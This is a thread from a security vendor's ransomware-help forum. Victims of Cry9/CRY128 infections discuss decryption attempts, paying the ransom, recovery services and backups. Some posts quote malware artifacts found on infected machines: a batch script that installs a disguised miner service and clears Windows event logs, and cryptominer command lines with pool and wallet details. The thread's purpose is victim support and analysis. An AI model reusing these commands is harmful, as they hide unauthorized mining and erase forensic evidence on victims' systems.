Jump to content

Cry9 - Invalid CRYPTON file pair

Abhijit

By Abhijit,
in Help, my files are encrypted!

 Share Followers 3

Recommended Posts

Sarah W

Sarah W 26

Posted
Posted
2 hours ago, ganymede said:

I think this guy might have the actual executable.

On a different note, I'm not sure why but I forgot to mention in my original post that I found the service registry of the virus in my Windows logs:

winlogon.exe
-a cryptonight -o stratum+tcp://xmr.crypto-pool.fr:443 -u 48Nk7Q5oB5gEVLabrgo3KhLbaTSDKvZNHBECoHyZcxWNDMgfDnHA8Ue2Skp7A6z2ZGG93wmLxxrKa1j4QR7kmi866AP1G8t -p x
Workstationt
C:\Windows
 

Maybe that long nonsense string has something to do with the key?

 

 

That's a cryptocoin miner. The criminals running this campaign drop these miners, which take up system resources and power in order to mine these coins for them, so it's not something you want on your system. Emsisoft Anti-Malware should be able to detect such threats, and if our product is of help then please consider buying it (the price is discounted and we protect against ransomware such as this one).

Some other advice is that investing in a good backup procedure is very important and well worth it. I would suggest having two or more backups, at least one disconnected. You will also need to secure RDP with a strong password if you continue to use RDP, as this is how the criminals enter the system.

We are still looking into this to see if there is anything we can do to help you decrypt.

Regards,

Sarah

Link to post
Share on other sites
mclaugb

mclaugb 2

Posted
Posted

Here is the windows script mine was running

run.bat

echo Havefun
C:\Windows\dell\svchost.exe install "Windows32_Update" "C:\Windows\dell\run64.bat"
C:\Windows\dell\svchost.exe start Windows32_Update
wevtutil cl "windows powershell"
wevtutil cl "security"
wevtutil cl "system"
echo Havefun

run64.bat

Update64 -o stratum+tcp://xmr.crypto-pool.fr:3333 -u 45EngfR9yFHGSGLXMSVh88XuErCN95qQYirYNm4pVaJDakxthy3KWPP2hgDBVaAwcBafup6sefXML3CTYXmZfSJLUfHQQXW -p x -dbg -1

Then repeated calls to the svchost.exe

Link to post
Share on other sites
GeorgeB

GeorgeB 3

Posted
Posted
9 hours ago, ganymede said:

I think this guy might have the actual executable.

On a different note, I'm not sure why but I forgot to mention in my original post that I found the service registry of the virus in my Windows logs:

winlogon.exe
-a cryptonight -o stratum+tcp://xmr.crypto-pool.fr:443 -u 48Nk7Q5oB5gEVLabrgo3KhLbaTSDKvZNHBECoHyZcxWNDMgfDnHA8Ue2Skp7A6z2ZGG93wmLxxrKa1j4QR7kmi866AP1G8t -p x
Workstationt
C:\Windows
 

Maybe that long nonsense string has something to do with the key?

 

What is last 35 bytes at the end of encrypted files (in my case is 31 of 00 and EF 52 5E A0)?

Link to post
Share on other sites
mclaugb

mclaugb 2

Posted
Posted

I finally gave in to the scam as our business did not have a backup and had some time sensitive materials.  EMISOFT--it would be nice if you could communicate with people in the forum a little more frequently and indicate a timeline, how we can help, etc.  I find it a little frustrating that few if any of your team are even on these forums.  Maybe we're too incapable of helping you but some updating would be nice.

Anyway, I saved all of the de-crypt exe files locally that the criminals gave me, my user number (number in all the filenames), and a >256 character keystring that the hacker website provided me.  The ransom allows you to download the decrypter exe for three different filetype extensions.  Mine are a bolal4nd.onion type so i used that exe.

The hardest thing was actually buying bitcoins and getting that done reasonably quickly.  I went to a bitcoin ATM and put in cash and set up a bitcoin wallet on Coinbase.  Cost about $275 bucks all in all, but i had put 20 hours into this, a new hard drive, etc.

For the record, the criminals tool did not initially decrypt the files correctly--it failed giving an error.  But there is a little checkbox "ignore checksum" that when clicked it says "may ruin the files".  I made a copy of some files I needed and pointed the decrypter at this "folder" to test whether it would damage the files.  The files opened near perfectly (some minor property information was lost) but It worked just fine and i have my files back.  Now i have it running on the whole hard drive.

The criminals also have a support box for you to send them files and your email address if the decrypt does not work for you.

I'm not advocating for the path that we chose, but the good guys at EMSISOFT could do more to communicate more frequently to allow users to help them. 

I now have the VIRUS exe files, unencrypted files, encrypted files, the exe decrypting engine, and at least one key for the engine.  EMSISOFT--SEND ME A MESSAGE IF YOU ARE INTERESTED.

 

 

 

 

  • Upvote 1
Link to post
Share on other sites
ganymede

ganymede 3

Posted
Posted

Just an opinion here, but the folks at Emsisoft are doing what they can to provide a FREE service to restore peoples' files, and for that no one has any reasonable ground on which to complain. I too have wondered as to their status, but with updates like Sarah's, I know that it's not being ignored. How much could they possibly share on a topic that most would likely not understand?

For my own situation, I have reached out to a specialist recovery service, and they claim to be able to restore my files for ~2000$, but I am waiting for the folks at Emsisoft because I'm confident they'll come up with something in a reasonable amount of time. And also because no matter the cost to my company, I refuse to negotiate with terrorists. Meanwhile I have been redoing lost work as needed. All in all, still probably less cost than the $2k being quoted.

If Fabian and the rest of Emsisoft's brain trust can fix this, you better believe I'm buying their product!

 

  • Upvote 1
Link to post
Share on other sites
bruticus0

bruticus0 3

Posted
Posted

Dude.  Take your business and complain to Kapersky, Norton, or Bitdefender.  See how many replies you get there about their decryptors.

Timeline?  All of us...every single one is here just for the "chance" that we might be able to get our files back.  Everyone on this thread is looking for a handout.  We haven't had to provide an Emsisoft license key, or sign up for anything to access any of the decryptors they have come out with.  Your files are lost and there's one guy.  ONE guy in this whole world that's actually trying to help you out.  And you want a timeline?

 1. You left your computers at risk in the first place. 2.  You wasn't even running the anti malware they sell to make a living that would have prevented the infection.   3.  Now you want them to contact you, instead of you just uploading the files offsite or bleeping computer, then emailing emsisoft with the links?  

Guys, we're only mooching off their good graces here.  

RANT OVER :P

Thanks for the update Sarah, we appreciate it. 

  • Upvote 1
Link to post
Share on other sites
mclaugb

mclaugb 2

Posted
Posted

Dear all, I couldn't agree more with your comments about not really having the right to complain. I have complained to the other companies as well, namely McAfee as their product totally failed and was disabled by this tool all together.

Sarah posting her note was encouraging, but it was the first indication at all on the forums that there was any hope.  I guess I was a little surprised that nobody from the company reached out to ask for any of the executables, file logs, Etc.  I guess I inferred from that that either they didn't care, we're not working on it, or already had them and did not need them. So Sarah's note saying they were working on it was definitely encouraging!

Lots of companies make free Tools in order to get their brand and their name out such that their products will be purchased.  I for example am considering buying site licenses for emsi soft products.  So "free" tools do ultimately tie into a business model.  Good for emsisoft.

Again if anyone wants encrypted files decrypted, keys, decrypting engine --do let me know if I can benefit the community through the ransom I paid.

Thank you emsisoft again for your efforts.

 

Bryan

Link to post
Share on other sites
CKWS

CKWS 1

Posted
Posted

Hi Brian and the rest of victims out there!

Have had some time today and took a look at the "unlock.exe" file (namely the one from here: https://www.dropbox.com/s/rdiqwrp4zarrfzd/unlock_gebdp3k7bolalnd4.onion.zip?dl=0 ) with a Debugger (Ollydbg) and a Decompiler (IDR, kb2014 knowledge base).

I'm not THAT skilled with such things but I think I found two hints that maybe can be used by professionals to maybe speed up things a little.

First one: Address of the "Unlock One" Button Click Event: 5CBD64

Second one: Private Key may be "BqdmQNCK1v8acZ12"

Would be great if someone would be able to check what happens at this Click Event and maybe sees how the encrypt/decrypt routine actually works.

Link to post
Share on other sites
Sarah W

Sarah W 26

Posted
Posted
20 hours ago, mclaugb said:

I finally gave in to the scam as our business did not have a backup and had some time sensitive materials.  EMISOFT--it would be nice if you could communicate with people in the forum a little more frequently and indicate a timeline, how we can help, etc.  I find it a little frustrating that few if any of your team are even on these forums.  Maybe we're too incapable of helping you but some updating would be nice.

Anyway, I saved all of the de-crypt exe files locally that the criminals gave me, my user number (number in all the filenames), and a >256 character keystring that the hacker website provided me.  The ransom allows you to download the decrypter exe for three different filetype extensions.  Mine are a bolal4nd.onion type so i used that exe.

The hardest thing was actually buying bitcoins and getting that done reasonably quickly.  I went to a bitcoin ATM and put in cash and set up a bitcoin wallet on Coinbase.  Cost about $275 bucks all in all, but i had put 20 hours into this, a new hard drive, etc.

For the record, the criminals tool did not initially decrypt the files correctly--it failed giving an error.  But there is a little checkbox "ignore checksum" that when clicked it says "may ruin the files".  I made a copy of some files I needed and pointed the decrypter at this "folder" to test whether it would damage the files.  The files opened near perfectly (some minor property information was lost) but It worked just fine and i have my files back.  Now i have it running on the whole hard drive.

The criminals also have a support box for you to send them files and your email address if the decrypt does not work for you.

I'm not advocating for the path that we chose, but the good guys at EMSISOFT could do more to communicate more frequently to allow users to help them. 

I now have the VIRUS exe files, unencrypted files, encrypted files, the exe decrypting engine, and at least one key for the engine.  EMSISOFT--SEND ME A MESSAGE IF YOU ARE INTERESTED.

14

A few things. First of all, we are a 30 people team, hardly the scale of most antivirus vendors with 500+ employees. This means that many of us have to work multiple roles and we offer the decrypters for free, meaning that we don't directly profit from them (however, we appreciate anyone who considers our products based on them), so they have to be balanced around the other work we have to do. Giving a timeline would not be a good idea, we rarely know how long it will take. We would not like to give a set time and then fail to meet it because we came across a problem we didn't expect. In the end, we do understand if you have to pay the ransom, however, we try to warn against doing so as this is what makes ransomware profitable.

We already have the malware file, so whilst you can upload the file to a post, it's not necessary to do so.

I do admit communication could be better and more regular but in general, if we have something new we will update. I will try to update more now.

I do have one suggestion whilst people are waiting, and that is using file/data recovery tools. I don't know how effective this will be but may provide some results for some people.

Regards,

Sarah

  • Upvote 1
Link to post
Share on other sites
Win32.DN

Win32.DN 0

Posted
Posted

My friend became the victim and I reversed uploaded "unlock.exe" yesterday.

The 36 (0x24) bytes variant is actually based on Cry9.

I already understand (i hope) how the unlocker decrypts the files.

The problem is factoring the AES128 key (and 0x1000+ bytes additional table), which looks to be different per the victim.

Maybe Fabian knows better about this part (or he is stuck at the same point).

I will look more when I have more time but don't expect good news from me.

Link to post
Share on other sites
GeorgeB

GeorgeB 3

Posted
Posted
On 5/11/2017 at 4:13 AM, mclaugb said:

I finally gave in to the scam as our business did not have a backup and had some time sensitive materials.  EMISOFT--it would be nice if you could communicate with people in the forum a little more frequently and indicate a timeline, how we can help, etc.  I find it a little frustrating that few if any of your team are even on these forums.  Maybe we're too incapable of helping you but some updating would be nice.

Anyway, I saved all of the de-crypt exe files locally that the criminals gave me, my user number (number in all the filenames), and a >256 character keystring that the hacker website provided me.  The ransom allows you to download the decrypter exe for three different filetype extensions.  Mine are a bolal4nd.onion type so i used that exe.

The hardest thing was actually buying bitcoins and getting that done reasonably quickly.  I went to a bitcoin ATM and put in cash and set up a bitcoin wallet on Coinbase.  Cost about $275 bucks all in all, but i had put 20 hours into this, a new hard drive, etc.

For the record, the criminals tool did not initially decrypt the files correctly--it failed giving an error.  But there is a little checkbox "ignore checksum" that when clicked it says "may ruin the files".  I made a copy of some files I needed and pointed the decrypter at this "folder" to test whether it would damage the files.  The files opened near perfectly (some minor property information was lost) but It worked just fine and i have my files back.  Now i have it running on the whole hard drive.

The criminals also have a support box for you to send them files and your email address if the decrypt does not work for you.

I'm not advocating for the path that we chose, but the good guys at EMSISOFT could do more to communicate more frequently to allow users to help them. 

I now have the VIRUS exe files, unencrypted files, encrypted files, the exe decrypting engine, and at least one key for the engine.  EMSISOFT--SEND ME A MESSAGE IF YOU ARE INTERESTED.

 

 

 

 

Dear Mclaugb,

Please share unlocker ,key provided and sample of encrypted files. I want to try to dissasembly unlocker.

Thanks!

Link to post
Share on other sites
GeorgeB

GeorgeB 3

Posted
Posted
9 hours ago, Win32.DN said:

My friend became the victim and I reversed uploaded "unlock.exe" yesterday.

The 36 (0x24) bytes variant is actually based on Cry9.

I already understand (i hope) how the unlocker decrypts the files.

The problem is factoring the AES128 key (and 0x1000+ bytes additional table), which looks to be different per the victim.

Maybe Fabian knows better about this part (or he is stuck at the same point).

I will look more when I have more time but don't expect good news from me.

Nice work,

Let's name this variant CRY36, Please confirm that this variant crypt files in 32 byte block and only first 320 blocks of 32 bytes(10k). Please share any knowledge about how this variant works.  

Thanks

Link to post
Share on other sites
Cookie

Cookie 0

Posted
Posted

Hello to all,

I had infected my computer on 10 May 2017. The whole files was encrypted by  filename.extension.xxxxxx.id_xxxxxx_fgb45ft3pqamyji7.onion.

The ID Ransomware site identificate as CRY9

I had also test the decryptor from emsisoft but it says the fille must be 68bytes diffeerent.

My example file is about 20MB and the different to crypted is 61bytes.

Maybe i do something wrong - or it is not a CRY9?

I have a backup but it's from several months ago. I don't now what to do now...

Thank's for help and good Job in fight with hakers.

Link to post
Share on other sites
bruticus0

bruticus0 3

Posted
Posted
9 hours ago, Cookie said:

Hello to all,

I had infected my computer on 10 May 2017. The whole files was encrypted by  filename.extension.xxxxxx.id_xxxxxx_fgb45ft3pqamyji7.onion.

The ID Ransomware site identificate as CRY9

I had also test the decryptor from emsisoft but it says the fille must be 68bytes diffeerent.

My example file is about 20MB and the different to crypted is 61bytes.

Maybe i do something wrong - or it is not a CRY9?

I have a backup but it's from several months ago. I don't now what to do now...

Thank's for help and good Job in fight with hakers.

 
 
9

The last decryptor for Cry that Emsi made is here .  I think it runs for most of us, it just doesn't find the key file.  So far, our files have had a 36 byte difference.  Like they said above, 32 bytes at the beginning of the file, then 4 bytes at the end I think.

Best thing to do is get rid   quarantine the infection if you can first.  (If you have the executable infection quarantined, you can then upload it).  Emsisoft has an Emergency Kit somewhere around here that does really well.  Then you can backup the encrypted files somewhere and get your C drive back to operating normally.  Then plug up any security holes in remote desktop, update your windows, and get a good anti malware installed.  There's a few free anti ransomware programs you can tack on in addition to antivirus/malware.  Malwarebytes makes one and I think Cybereason does too.  Bitdefender has one, but I think it's hard to find.  And disable or  secure your Remote Desktop and Remote Assistance Connections.

You can upload a file pair here if you want.  Wouldn't hurt.  A file pair is an original file and its encrypted counterpart.  You should be able to find an original somewhere.  Program readmes are usually the same.  And .exe files of the same version can be downloaded again.  Then just check back here for any new updates.  If they release a new decryptor anytime in the future, you'll have your backed up files to use it with.

Link to post
Share on other sites
Cookie

Cookie 0

Posted
Posted
11 hours ago, bruticus0 said:

The last decryptor for Cry that Emsi made is here .  I think it runs for most of us, it just doesn't find the key file.  So far, our files have had a 36 byte difference.  Like they said above, 32 bytes at the beginning of the file, then 4 bytes at the end I think.

Best thing to do is get rid of the infection if you can first.  Emsisoft has an Emergency Kit somewhere around here that does really well.  Then you can backup the encrypted files somewhere and get your C drive back to operating normally.  Then plug up any security holes in remote desktop, update your windows, and get a good anti malware installed.  There's a few free anti ransomware programs you can tack on in addition to antivirus/malware.  Malwarebytes makes one and I think Cybereason does too.  Bitdefender has one, but I think it's hard to find.  And disable or  secure your Remote Desktop and Remote Assistance Connections.

You can upload a file pair here if you want.  Wouldn't hurt.  A file pair is an original file and its encrypted counterpart.  You should be able to find an original somewhere.  Program readmes are usually the same.  And .exe files of the same version can be downloaded again.  Then just check back here for any new updates.  If they release a new decryptor anytime in the future, you'll have your backed up files to use it with.

Thank You for Your answer, i had an old copy of some files. But the diference between orginal and infected of my files is about 61bytes. It is not 68bytes and not 36bytes also :( I don't now where is the problem...


Maybe it is another ransom?

Link to post
Share on other sites
bruticus0

bruticus0 3

Posted
Posted

I was actually wrong above.  Should try to quarantine the infection.  If they have the .exe, they can try to make a decryptor a little easier.  So if you do have a new variant of this, that exe would prolly be important in the process.  Sorry :P

Good job in figuring that out matwa.  Maybe that one random byte has something to do with the encryption of the file.  With everyone's info, we know a lot more than we did a week or two ago.

Also, just in case you didn't know.  These acts are cyber crimes/terrorism, whatever you wanna call it.  You can report it to the authorities.  In the US you can file a complaint with the IC3 here .  The more people that report, the more it'll draw attention to the issue and let'em try and do something about it.

Link to post
Share on other sites
mclaugb

mclaugb 2

Posted
Posted

Did you get the 15321.exe file and the two batch files?  The svchost.exe was being called by that batch file every 2 minutes in my firewall logs once the virus hit.  I'm going to upload a packet of files the decryptor, pre decrypted files, and post decrypted files tomorrow.  They are mostly ascii files so they are very easy to read with a hex editor.  Maybe having one solution to the encryption will help folks generate a decryptor.  There is a 4 digit number the ransomware generates when you login to pay.  That likely is used in the unlock key.

Link to post
Share on other sites
AL3918

AL3918 0

Posted
Posted

I am a drafter in California.  My computer was infected with the Cry9 *.onion encryption.       I went on every forum...researching for days if anyone had any solutions...and was lead here and have seen other people have complained about a similar *.onion encryption.  This forum helped me to reboot to safe mode so I could run an antimalware sweep.   Thank you Emsisoft.  I am just a regular person....computer drafter who's cad files had all been encrypted with the onion encryption.   Thousands of drafting hours potentially lost.  I am no computer programmer or IT expert.  This forum was very informative at least helping me understand the nature and severity of this nasty encryption.  Over the years I've dealt with different kids of malware.....Trojan Vundo with the biohazard icon on the desktop, that one virus that converted my files to hidden types, ect.   Typically I could jump on a forum and within a couple hours research .....someone had a solution.   This cry9 variant truly caused severe stress to my life, my coworkers, and our families. 


I want to share how I was able to recover all my files ....all 222 GB of it.   I hired a company called proven data recovery.  It took about 4 days for them to decrypt the files.   I was unsure at first since one data recovery company told me it was going to cost $20k to decrypt.   I called a couple others......by chance found proven data recovery and their fee was much more reasonable.  So for those who have files encrypted with the *.onion cry9, proven data recovery helped me.   Maybe there is another way to deal directly with the terrorists but my company did not feel comfortable doing that and possibly giving money via bitcoin with no proven return our files would be decrypted.


This whole ordeal has taught me a couple things.....get a cloud backup and backup data at least every week to an external hardrive......  keep the operating software/updates up-to-date.   

Link to post
Share on other sites
bruticus0

bruticus0 3

Posted
Posted

Thanks for the input Al, we appreciate it.  Even if it costs some money, having another option open to recover your files is a good thing.

On the subject of backups, I've found I kind of like the idea behind Macrium Reflect.  It's expensive for the paid version, but the free version does what you need too without any bells and whistles.

There's a two step thing.  First you can make a backup that is a image of the drive itself.  The image file is also compressed which saves you some space.  You can do one time backups with free version, then put that backup on an external device you keep offline, or upload it yourself to the cloud somewhere.

The second step you do is under "Other Tasks".   It's called a "Rescue Media".  What this does is put Windows Pocket Edition (PE), along with Macrium onto a bootable usb or CD.  This can be stored offline as well.  So to restore from a backup, take the usb, load it up, and it will start a Windows PE session on your computer.  Then get your backup image from the cloud or wherever you kept it.  Plug it in and direct Macrium to look there and you can choose that image.  It will then start to restore your backup.  

It's a really simple process to do.  I did a restore on my new OS install and everything went ok except for one or two Asus drivers.  They didn't really like being restored that way.  Other than that, it's a very easy backup plan I think.  If you have the paid version of it, you can do backup schedules.  Grandfather, Incremental, Differential, and a Full Synthetic type backup.

Link to post
Share on other sites
kygiacomo

kygiacomo 2

Posted
Posted
On 5/10/2017 at 9:13 PM, mclaugb said:

I finally gave in to the scam as our business did not have a backup and had some time sensitive materials.  EMISOFT--it would be nice if you could communicate with people in the forum a little more frequently and indicate a timeline, how we can help, etc.  I find it a little frustrating that few if any of your team are even on these forums.  Maybe we're too incapable of helping you but some updating would be nice.

Anyway, I saved all of the de-crypt exe files locally that the criminals gave me, my user number (number in all the filenames), and a >256 character keystring that the hacker website provided me.  The ransom allows you to download the decrypter exe for three different filetype extensions.  Mine are a bolal4nd.onion type so i used that exe.

The hardest thing was actually buying bitcoins and getting that done reasonably quickly.  I went to a bitcoin ATM and put in cash and set up a bitcoin wallet on Coinbase.  Cost about $275 bucks all in all, but i had put 20 hours into this, a new hard drive, etc.

For the record, the criminals tool did not initially decrypt the files correctly--it failed giving an error.  But there is a little checkbox "ignore checksum" that when clicked it says "may ruin the files".  I made a copy of some files I needed and pointed the decrypter at this "folder" to test whether it would damage the files.  The files opened near perfectly (some minor property information was lost) but It worked just fine and i have my files back.  Now i have it running on the whole hard drive.

The criminals also have a support box for you to send them files and your email address if the decrypt does not work for you.

I'm not advocating for the path that we chose, but the good guys at EMSISOFT could do more to communicate more frequently to allow users to help them. 

I now have the VIRUS exe files, unencrypted files, encrypted files, the exe decrypting engine, and at least one key for the engine.  EMSISOFT--SEND ME A MESSAGE IF YOU ARE INTERESTED.

 

 

 

 

so ur mad at emsi for your own mistake? i find that a little odd to say the least. people like you are what keeps these terrorists in business. i have Emsisoft internet secuirty and i can honestly say that i have never had a virus,malware or ransomware.

Link to post
Share on other sites
ganymede

ganymede 3

Posted
Posted
4 hours ago, AL3918 said:

I want to share how I was able to recover all my files ....all 222 GB of it.   I hired a company called proven data recovery.  It took about 4 days for them to decrypt the files.   I was unsure at first since one data recovery company told me it was going to cost $20k to decrypt.   I called a couple others......by chance found proven data recovery and their fee was much more reasonable.  So for those who have files encrypted with the *.onion cry9, proven data recovery helped me.   Maybe there is another way to deal directly with the terrorists but my company did not feel comfortable doing that and possibly giving money via bitcoin with no proven return our files would be decrypted.

Ahh this was the company I reached out to as well. They quoted me ~$1900 for 5-7 day service. I opted not to pursue in the hopes that Emsi will come out with something in the near future, but if I need the data sooner, it's good to know now that they're a sure thing. Thanks for the info.

 

Link to post
Share on other sites
ganymede

ganymede 3

Posted
Posted

Most commonly it's been brute force entry via Remote Desktop, though I've been hearing in the news lately that Office 365 and some other feature Windows comes with were also points of entry. I can't remember the name of the other thing off the top of my head but apparently it was a serious enough vulnerability that Microsoft released updates for old OSes as far back as XP.

 

Link to post
Share on other sites
Kevin Zoll

Kevin Zoll 309

Posted
Posted

WannaCry exploits an unpatched vulnerability in the SMBv1 protocol on unpatched Windows systems.  If your system is up to date then it is not vulnerable.  MS has released a patch for Win XP, Server 2003, and Win 8 to patch SMBv1 on those no longer supported operating systems.

Link to post
Share on other sites
mclaugb

mclaugb 2

Posted
Posted

Hi Folks, I'm not sure if these files will help, but I've posted all of the virus files, ID, decryption key (provided by the scammers), etc.

I'm hopeful that this will help those with the expertise to save others time and money.  But it was a horrible experience with CRY128 which i hope will guide others in how the scam can be cracked.  I had no backup and was in a time pinch at our company, so I could not wait it out for a crack.  I also use R-soft tools for recovery and found some files, but unfortunately R-soft cannot recognize common engineering formatted files so it couldn't find those.

First I found the virus files reaking havoc by looking at Endpoint Security logs and windows System / App logs.

The smoking gun appeared to be pointed at a c:\windows\dell folder containing some batch files.  Also a file 15321.exe kept appearing in my c:\ directory  (All of these files are zipped in folder VIRUS_FILES).  I password protected the ZIP file with the word "infected" so that no accidents happen.

In a pinch, I had to pay the ransom. Using the Tor browser, the Ransom page asks you to enter your FILE ID.

In my case, all files were named "*1638578921*.onion  You can play with the attached encrypted files and the decryptor.

The TOR Browser pulls up a "Decrypt panel"

THe ID KEY must be typed in:  (in my case 1638578921)

There is then a "Show code" box which currently displays "35352" with a blank box.  You must re-enter the code in that box.  (Presumably this is used in some way to generate the key).

You then press enter and it provides you with an address to send the bitcoins to.  

Note, the number was the same when I visited the webpage multiple times within a 24 hour period, but I think it has changed.  

Once paid, it provides you three files to download.  (I have attached all three versions in the zip file).  I have attached the instruction page (after you pay) and the "decrypt" password for all of the decryption software.

Your ID: 1638578921

PRIVATE KEY:
313633383537383932315FB78EB17DCE9907B7E60F97A278A391F8497C82918C9523B80364249F1E9290C75FD2B0817449A77D8D32097A9DB94FB0BF5F652D94F73902A514DDD91E683E415FF26D19F0A860C8D743DEBB73E5AAC703D35F805065EEB1111EE828D301637FEA7EB90B5DB744E04B20026440BB398CD9169EDF7237CDFAB4611FE9563922D151A757A151B5E1D046FC4A53379B9859D9B5598082E84A7F6651CC805FE562AE8973AEA8845CF2DC25E8E409DBE7434F31C1B0B5FD5CA3EA60736DA77A2CAA1C8C17AC23EEECA445FBAB95B2F5E668C5729DB6DBB4738E10508C802BED5742064CD3F902ED75E7151033E2419F1037E283AB9F835AA25C1975C98FE3D5966D545039FA9C2B3A4FEAE1A6906BDA11417C34F96ECEF86FEC5173DBBA10526D0F8BE586D616B01CA030F6EF16182C1AA6EB493F0612836D7CC2DD8B510C93B1BA7454FA2539D296ACC6272431DDE2AB50940BBE2F00

The decryptor does not work as you will see without checking "ignore checksum" box.  Then it decrypts the files just fine.

Anyway, I hope this helps.

Bryan

 

 

CRY128_FILES_UNLOCK.zip

README.TXT.txt

Link to post
Share on other sites
CKWS

CKWS 1

Posted
Posted
vor 10 Stunden schrieb AL3918:

I want to share how I was able to recover all my files ....all 222 GB of it.   I hired a company called proven data recovery.  It took about 4 days for them to decrypt the files.   I was unsure at first since one data recovery company told me it was going to cost $20k to decrypt.   I called a couple others......by chance found proven data recovery and their fee was much more reasonable.  So for those who have files encrypted with the *.onion cry9, proven data recovery helped me.   Maybe there is another way to deal directly with the terrorists but my company did not feel comfortable doing that and possibly giving money via bitcoin with no proven return our files would be decrypted.

 

Would be interesting how this company did it. Do they have a decrypter or do they just pay the ransom (which is less than what they receive from you) and keep the rest?

If they have a working decrypter it would be worth considering their service. If they only act as "man in the middle" and criminals still get paid it is worthless.

Link to post
Share on other sites
GeorgeB

GeorgeB 3

Posted
Posted
7 hours ago, mclaugb said:

Hi Folks, I'm not sure if these files will help, but I've posted all of the virus files, ID, decryption key (provided by the scammers), etc.

I'm hopeful that this will help those with the expertise to save others time and money.  But it was a horrible experience with CRY128 which i hope will guide others in how the scam can be cracked.  I had no backup and was in a time pinch at our company, so I could not wait it out for a crack.  I also use R-soft tools for recovery and found some files, but unfortunately R-soft cannot recognize common engineering formatted files so it couldn't find those.

First I found the virus files reaking havoc by looking at Endpoint Security logs and windows System / App logs.

The smoking gun appeared to be pointed at a c:\windows\dell folder containing some batch files.  Also a file 15321.exe kept appearing in my c:\ directory  (All of these files are zipped in folder VIRUS_FILES).  I password protected the ZIP file with the word "infected" so that no accidents happen.

In a pinch, I had to pay the ransom. Using the Tor browser, the Ransom page asks you to enter your FILE ID.

In my case, all files were named "*1638578921*.onion  You can play with the attached encrypted files and the decryptor.

The TOR Browser pulls up a "Decrypt panel"

THe ID KEY must be typed in:  (in my case 1638578921)

There is then a "Show code" box which currently displays "35352" with a blank box.  You must re-enter the code in that box.  (Presumably this is used in some way to generate the key).

You then press enter and it provides you with an address to send the bitcoins to.  

Note, the number was the same when I visited the webpage multiple times within a 24 hour period, but I think it has changed.  

Once paid, it provides you three files to download.  (I have attached all three versions in the zip file).  I have attached the instruction page (after you pay) and the "decrypt" password for all of the decryption software.

Your ID: 1638578921

PRIVATE KEY:
313633383537383932315FB78EB17DCE9907B7E60F97A278A391F8497C82918C9523B80364249F1E9290C75FD2B0817449A77D8D32097A9DB94FB0BF5F652D94F73902A514DDD91E683E415FF26D19F0A860C8D743DEBB73E5AAC703D35F805065EEB1111EE828D301637FEA7EB90B5DB744E04B20026440BB398CD9169EDF7237CDFAB4611FE9563922D151A757A151B5E1D046FC4A53379B9859D9B5598082E84A7F6651CC805FE562AE8973AEA8845CF2DC25E8E409DBE7434F31C1B0B5FD5CA3EA60736DA77A2CAA1C8C17AC23EEECA445FBAB95B2F5E668C5729DB6DBB4738E10508C802BED5742064CD3F902ED75E7151033E2419F1037E283AB9F835AA25C1975C98FE3D5966D545039FA9C2B3A4FEAE1A6906BDA11417C34F96ECEF86FEC5173DBBA10526D0F8BE586D616B01CA030F6EF16182C1AA6EB493F0612836D7CC2DD8B510C93B1BA7454FA2539D296ACC6272431DDE2AB50940BBE2F00

The decryptor does not work as you will see without checking "ignore checksum" box.  Then it decrypts the files just fine.

Anyway, I hope this helps.

Bryan

 

 

CRY128_FILES_UNLOCK.zip

README.TXT.txt

Please send these files. I cannot download from original post. Thanks.

  • Upvote 1
Link to post
Share on other sites
AL3918

AL3918 0

Posted
Posted

CKWS.....I do not know how they decrypted.  After I gave my credit card info to them, took a deep breath and hoped everything would turn out ok.   I received an email from proven data that gave instructions on how to setup a remote connection for their technician.  I could see the technician login remotely (screen turned black) and I could see the mouse pointer moving around going through my files.   I didn't stare at the server the whole time....it was on a Friday and came into work on Monday and the pointer was still moving around...I don't know if one technician worked on my server or multiple......The technician had access to the ransom note so it is plausible they directly contacted them or they were able to decrypt on their own.  I'm not sure.  I don't like the idea of a hacker getting some kind of payment...but at the same time I had files....that represented thousands of hours of Autocad drafting that were unusable.   It was not "worthless" to me since all my data was recovered and even though a handful of my clients got pissed off for the delay in our drafting production......if I couldn't get all my files back....most likely this could've closed down my company.

Link to post
Share on other sites
kygiacomo

kygiacomo 2

Posted
Posted

from what i have read on the emsisoft blog its gonna be nearly impossible to decrypt the files without getting some professionals that use forensic data recovery to get your files back or paying the ransom. i hope everyone has learned a valuble lesson here and updates their OS,makes back ups of files and gets the proper internet security such as emsisoft to protect your computers. i have emsisoft internet secuirty,zemana and malwarebtyes on my system and i have yet to get any malware,virsus or ransomware on my computer.

  • Downvote 2
Link to post
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
 Share
Followers 3
Go to topic listing

  • Recently Browsing   0 members

    No registered users viewing this page.

Products & Services

Ransomware/Malware Removal

Partners

Resources

Company

© 2003-2021 Emsisoft - 04/18/2021 - Legal Notice - Terms - Bug Bounty - System Status - Privacy Policy

×
×
  • Create New...